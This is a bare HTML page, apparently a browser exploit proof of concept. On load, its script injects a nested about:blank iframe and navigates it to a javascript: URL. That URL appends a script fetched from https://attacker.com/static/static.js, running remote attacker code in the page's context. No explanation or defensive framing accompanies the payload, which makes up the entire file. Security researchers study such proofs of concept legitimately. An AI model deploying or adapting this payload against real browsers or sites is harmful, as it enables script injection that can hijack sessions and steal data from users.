<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGGnWKHGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGGnWKHGGGGG.onload=_=>GGGGGGnWKHGGGGG.contentDocument.body.innerHTML+="<iframe id=GGGGGnWKHGGGG src=about:blank><\/iframe><script>GGGGGnWKHGGGG.addEventListener('load',()=>{GGGGGnWKHGGGG.contentWindow.location.href='javascript:var o=document.createElement(`script`);o.src=`https://attacker.com/static/static.js`;document.body.appendChild(o);void(0);';},{once:true});<\/script>";GGGGGGnWKHGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>